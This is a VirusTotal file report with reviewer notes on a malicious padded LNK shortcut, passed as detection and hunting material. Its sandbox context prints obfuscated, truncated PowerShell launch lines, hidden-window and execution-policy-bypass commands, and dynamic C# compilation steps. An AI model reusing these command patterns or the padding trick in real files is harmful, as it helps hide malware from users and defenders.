302725413076d1aeaee2d7f2b3692646
Hash
- MD5: 302725413076d1aeaee2d7f2b3692646
- SHA1: 9a6946ca040c259a59deb11942d94ebbcff0cdef
- SHA256: 2df24d850d6a50410e6503bc449a61778e5e88722ea4e20e198ea61e45a6903e
- First Seen: 2026-04-03
- Last Seen: 2026-04-03
- Related Reports: 1
- Related IOCs: 0
Additional Information
VirusTotal file report (API v3 `files/{sha256}` object; `last_analysis_results` holds per-engine verdicts, `sigma_analysis_results` holds behavioral matches with their event context). Reviewer notes: (1) The `Hashes` values inside the Sigma `match_context` entries are those of the `csc.exe` and `powershell.exe` images that executed (OriginalFileName/Company fields show Microsoft binaries), not of the malware — do not ingest them as indicators. (2) Several `undetected` verdicts come from engines whose `engine_update` date lags far behind the April 2026 updates used by most vendors (e.g. Baidu 20190318, Acronis 20240328, CrowdStrike 20251219), so those non-detections carry little weight. (3) Host artefacts visible in the match context that are worth hunting for: the dropped `firefox.ps1`, `news.ps1` and `Microsoft\Windows\CloudStore\facebook.ps1` under `%APPDATA%`, `.cmdline` files under `%TEMP%` (dynamic C# compilation via `csc.exe` spawned by PowerShell), and the `$VIUSBvejbawf` variable in the obfuscated PowerShell command line launched from the LNK.
{
"data": {
"id": "2df24d850d6a50410e6503bc449a61778e5e88722ea4e20e198ea61e45a6903e",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/2df24d850d6a50410e6503bc449a61778e5e88722ea4e20e198ea61e45a6903e"
},
"attributes": {
"type_tag": "lnk",
"names": [
"2df24d850d6a50410e6503bc449a61778e5e88722ea4e20e198ea61e45a6903e.lnk"
],
"crowdsourced_yara_results": [
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "Large_filesize_LNK",
"match_date": 1776146696,
"description": "Identifies shortcut (LNK) file larger than 100KB. Most goodware LNK files are smaller than 100KB.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "000a2489bd",
"ruleset_version": "000a2489bd|48401e01afaf50f369a7c99eab393389320c7380",
"ruleset_name": "expl_lnk_zdi_can_25373",
"rule_name": "EXT_EXPL_ZTH_LNK_EXPLOIT_A",
"match_date": 1776146696,
"description": "This YARA file detects padded LNK files designed to exploit ZDI-CAN-25373.",
"author": "Peter Girnus",
"source": "https://github.com/Neo23x0/signature-base"
},
{
"ruleset_id": "000bd045c7",
"ruleset_version": "000bd045c7|1d926845269a3ac8de0431da133950390b5cced3",
"ruleset_name": "gen_susp_lnk",
"rule_name": "SUSP_LNK_Big_Link_File",
"match_date": 1776146696,
"description": "Detects a suspiciously big LNK file - maybe with embedded content",
"author": "Florian Roth (Nextron Systems)",
"source": "https://github.com/Neo23x0/signature-base"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "PS_in_LNK",
"match_date": 1776146696,
"description": "Identifies PowerShell artefacts in shortcut (LNK) files.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
}
],
"first_submission_date": 1774580999,
"tlsh": "T149252135AACDD2402870ED79A2458E6FD86AF7E1A75B70531133CBCC5A0A46BC5A3F31",
"type_tags": [
"windows",
"lnk"
],
"magic": "MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Thu Dec 31 23:59:59 1969, mtime=Thu Dec 31 23:59:59 1969, atime=Thu Dec 31 23:59:59 1969, length=0, window=hidenormalshowminimized",
"trid": [
{
"file_type": "Windows Shortcut",
"probability": 100.0
}
],
"reputation": -1,
"vhash": "3a3aa9c652cbe087bd436db96feb0618",
"meaningful_name": "2df24d850d6a50410e6503bc449a61778e5e88722ea4e20e198ea61e45a6903e.lnk",
"md5": "302725413076d1aeaee2d7f2b3692646",
"sigma_analysis_results": [
{
"rule_level": "high",
"rule_id": "76e8bb8877ab40bd84b14fc93daffe9ff7ebe9440ce09916b5c63a302d62c918",
"rule_source": "Joe Security Rule Set (GitHub)",
"rule_title": "Dot net compiler compiles file from suspicious location",
"rule_description": "Dot net compiler compiles file from suspicious location",
"rule_author": "Joe Security",
"match_context": [
{
"values": {
"Hashes": "MD5=F65B029562077B648A6A5F6A1AA76A66,SHA256=4A6D0864E19C0368A47217C129B075DDDF61A6A262388F9D21045D82F3423ED7,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "csc.exe",
"Product": "Microsoft\\xae .NET Framework",
"Description": "Visual C# Command Line Compiler",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"CommandLine": "\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\y5g3zxy3\\y5g3zxy3.cmdline\"",
"FileVersion": "4.8.4084.0 built by: NET48REL1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /noconfig /fullpaths @C:\\Users\\<USER>\\AppData\\Local\\Temp\\44migqql\\44migqql.cmdline",
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "high",
"rule_id": "b0e07fc365ce0d0690c84a20e3467a5be2301d1c4de1e87bcbb9cb9ea841222c",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Csc.EXE Execution Form Potentially Suspicious Parent",
"rule_description": "Detects a potentially suspicious parent of \"csc.exe\", which could be a sign of payload delivery.",
"rule_author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae .NET Framework",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "csc.exe",
"Hashes": "MD5=F65B029562077B648A6A5F6A1AA76A66,SHA256=4A6D0864E19C0368A47217C129B075DDDF61A6A262388F9D21045D82F3423ED7,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",
"Description": "Visual C# Command Line Compiler",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"CommandLine": "\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\y5g3zxy3\\y5g3zxy3.cmdline\"",
"FileVersion": "4.8.4084.0 built by: NET48REL1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "f4143907bd6e32636e7bc2f3b4f1fca7dde5ff6787f10a17b360a798f52c6357",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Uncommon Svchost Command Line Parameter",
"rule_description": "Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.\nThis could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.\n",
"rule_author": "Liran Ravich",
"match_context": [
{
"values": {
"CommandLine": "%WINDIR%\\system32\\svchost.exe",
"Image": "C:\\Windows\\system32\\svchost.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "high",
"rule_id": "fe226328e3589518f77bd1ce4b456e119e55dde2c461f9c95e33b4e2a9f4373d",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious LNK Command-Line Padding with Whitespace Characters",
"rule_description": "Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D).\nAdversaries insert non-printable whitespace characters (e.g., Line Feed \\x0A, Carriage Return \\x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary.\nThe hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion\u2014commonly used for social engineering attacks.\nThis rule flags suspicious use of such padding observed in real-world attacks.\n",
"rule_author": "Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\favorite.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "06b48fa7870d38bdf92b4d4a9b9c4a4df779bd405fdc5ba0e70911df20027ce1",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Change PowerShell Policies to an Insecure Level",
"rule_description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"-ExecutionPolicy\" flag.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\favorite.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -ExecutionPolicy Bypass -File C:\\Users\\Bruno\\AppData\\Roaming\\news.ps1 ",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"Description": "Windows PowerShell",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe $VIUSBvejbawf = \\145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 88 115 116 88 57 24 117 116 72 61 94 62 42 36 161 176 140 141 140 235 182 11 237 68 25 235 34 31 236 153 17 236 21 41 235 1 181 235 19 85 236 41 17 64 235 176 58 122 235 43 6 235 182 11 234 37 53 234 179 27 234 176 45 236 49 13 235 176 169 236 52 81 135 61 74 57 124 81 165 114 65 57 58 43 126 79 169 183 77 57 58 125 [TRUNCATED]",
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "5e2ea8c055dd73ea66238735323d0318c2a6c114047137146357b85f764b1101",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell WindowStyle Option",
"rule_description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n",
"rule_author": "frack113, Tim Shelton (fp AWS)",
"match_context": [
{
"values": {
"ScriptBlockText": " 69 43 47 26 80 170 79 68 66 58 43 93 165 177 90 56 60 54 65 82 143 148 66 74 77 47 57 72 104 101 84 90 58 45 53 30 98 177 145 71 62 47 46 99 160 170 67 76 55 96 44 39 99 156 145 75 60 62 48 41 97 139 84 64 73 125 99 108 128 107 63 62 67 58 113 53 100 119 99 72 61 42 57 25 85 185 136 88 60 54 126 104 101 98 73 65 66 51 109 108 156 145 80 76 74 58 44 25 169 181 77 72 77 59 57 26 86 185 136 88 59 58 44 75 98 116 71 57 142 123 61 37 100 107 65 141 129 80 41 24 131 112 73 72 142 123 57 39 100 185 13 [TRUNCATED]",
"MessageTotal": "2",
"ScriptBlockId": "1e33ce21-71c6-403d-b008-2e4c1ca2d21e",
"Path": "",
"EventID": "4104",
"MessageNumber": "2"
}
},
{
"values": {
"ScriptBlockText": "0 122 43 140 181 76 130 138 62 44 37 86 126 132 80 115 123 46 79 167 113 70 62 62 125 99 104 86 156 117 133 140 101 124 96 167 102 123 139 133 100 122 26 140 181 69 141 129 45 57 28 93 120 82 72 142 125 47 106 157 183 65 139 115 57 47 26 100 120 82 69 134 123 53 24 100 108 149 68 64 127 122 26 100 105 140 50 138 59 57 38 140 181 81 72 72 127 113 26 100 105 73 76 75 58 126 104 96 101 80 64 130 123 43 24 87 126 145 68 81 100 122 35 158 174 122 48 109 59 58 95 117 96 69 72 142 114 74 19 89 116 113 [TRUNCATED]",
"MessageTotal": "2",
"ScriptBlockId": "a4d2477b-a84f-44b3-81ef-7f3bd78eda68",
"Path": "",
"EventID": "4104",
"MessageNumber": "2"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "b39586c79bf4d0d43c937efa6129ebb6f0b2cf03b7038a3a8234f84c147600f7",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Dynamic .NET Compilation Via Csc.EXE",
"rule_description": "Detects execution of \"csc.exe\" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.",
"rule_author": "Florian Roth (Nextron Systems), X__Junior (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae .NET Framework",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "csc.exe",
"Hashes": "MD5=F65B029562077B648A6A5F6A1AA76A66,SHA256=4A6D0864E19C0368A47217C129B075DDDF61A6A262388F9D21045D82F3423ED7,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",
"Description": "Visual C# Command Line Compiler",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"CommandLine": "\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\y5g3zxy3\\y5g3zxy3.cmdline\"",
"FileVersion": "4.8.4084.0 built by: NET48REL1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /noconfig /fullpaths @C:\\Users\\<USER>\\AppData\\Local\\Temp\\44migqql\\44migqql.cmdline",
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\favorite.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -ExecutionPolicy Bypass -File C:\\Users\\Bruno\\AppData\\Roaming\\news.ps1 ",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe $VIUSBvejbawf = \\145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 88 115 116 88 57 24 117 116 72 61 94 62 42 36 161 176 140 141 140 235 182 11 237 68 25 235 34 31 236 153 17 236 21 41 235 1 181 235 19 85 236 41 17 64 235 176 58 122 235 43 6 235 182 11 234 37 53 234 179 27 234 176 45 236 49 13 235 176 169 236 52 81 135 61 74 57 124 81 165 114 65 57 58 43 126 79 169 183 77 57 58 125 [TRUNCATED]",
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\<USER>\\AppData\\Roaming\\firefox.ps1",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "764276dba9654bf07d000fa390ae98de360ac172927cf3ef64f2db6c5b9be3b2",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Dynamic CSharp Compile Artefact",
"rule_description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\y5g3zxy3\\y5g3zxy3.cmdline"
}
},
{
"values": {
"TargetFilename": "C:\\Users\\<USER>\\AppData\\Local\\Temp\\44migqql\\44migqql.cmdline"
}
},
{
"values": {
"TargetFilename": "%TEMP%\\lbdo4ud5.cmdline"
}
}
]
},
{
"rule_level": "low",
"rule_id": "7cf0b126730658e7c96da1ae0b63c1bb84154a239ca32c09909963038dfdcacf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "PowerShell Script Dropped Via PowerShell.EXE",
"rule_description": "Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"EventID": "11"
}
},
{
"values": {
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\facebook.ps1"
}
},
{
"values": {
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Roaming\\news.ps1"
}
}
]
}
],
"sha256": "2df24d850d6a50410e6503bc449a61778e5e88722ea4e20e198ea61e45a6903e",
"last_submission_date": 1774585254,
"last_analysis_results": {
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": "2.0.0.1",
"engine_update": "20260413",
"category": "malicious",
"result": "LNK.ScriptQH.Trojan"
},
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260414",
"category": "malicious",
"result": "Trojan.WinLNK.Pantera.4!c"
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260414",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.092F4C5B"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"Skyhigh": {
